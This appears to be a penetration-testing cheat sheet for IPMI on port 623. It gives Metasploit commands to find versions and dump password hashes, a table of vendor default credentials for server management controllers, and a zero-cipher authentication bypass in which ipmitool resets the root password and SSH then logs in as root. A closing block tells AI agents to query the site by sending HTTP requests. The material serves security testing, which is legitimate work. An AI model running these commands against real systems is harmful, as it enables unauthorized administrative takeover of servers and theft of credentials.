# 623 - IPMI

### Metasploit

### Find version

```
msf > use auxiliary/scanner/ipmi/ipmi_version
msf auxiliary(ipmi_version) > set RHOSTS 10.0.0.0/24
msf auxiliary(ipmi_version) > run
[*] Sending IPMI requests to 10.0.0.0->10.0.0.255 (256 hosts)
[+] 10.0.0.22:623 - IPMI - IPMI-2.0 UserAuth(auth_user,non_null_user) PassAuth(md5,md2)Level(1.5,2.0)
```

### Dump hashes

```
use auxiliary/scanner/ipmi/ipmi_dumphashes 
set rhosts [TARGETS] 
run 
```

### Common default credentials

| Product Name                                    | Default Username | Default Password                         |
| ----------------------------------------------- | ---------------- | ---------------------------------------- |
| HP Integrated Lights Out (iLO)                  | Administrator    | \<factory randomized 8-character string> |
| Dell Remote Access Card (iDRAC, DRAC)           | root             | calvin                                   |
| IBM Integrated Management Module (IMM)          | USERID           | PASSW0RD (with a zero)                   |
| Fujitsu Integrated Remote Management Controller | admin            | admin                                    |
| Supermicro IPMI (2.0)                           | ADMIN            | ADMIN                                    |
| Oracle/Sun Integrated Lights Out Manager (ILOM) | root             | changeme                                 |
| ASUS iKVM BMC                                   | admin            | admin                                    |

Resources: <https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/>

## Zero cipher authentication bypass

Zero cipher authentication bypass resulting in administrative access

### Check if vulnerable

```
msf > use auxiliary/scanner/ipmi/ipmi_cipher_zero
msf auxiliary(ipmi_cipher_zero) > set RHOSTS 10.0.0.22
msf auxiliary(ipmi_cipher_zero) > run
[*] Sending IPMI requests to 10.0.0.22->10.0.0.22 (1 hosts)
[+] 10.0.0.22:623 - IPMI - VULNERABLE: Accepted a session open request
```

### Connect

The Linux ipmitool client is used to interact with the service and bypass authentication (via the -C 0 option).

We will set the root user account
&#x20;password to abc123 via IPMI.

```
root@kali:~# ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
2 root true true true ADMINISTRATOR
3 Oper1 true true true ADMINISTRATOR
root@kali:~# ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123
root@kali:~# ssh root@10.0.0.22
root@10.121.1.22's password: abc123
17
18
19 20
/admin1-> version
SM CLP Version: 1.0.2
SM ME Addressing Version: 1.0.0b
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://infra.newerasec.com/infrastructure-testing/enumeration/services-ports/ipmi.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.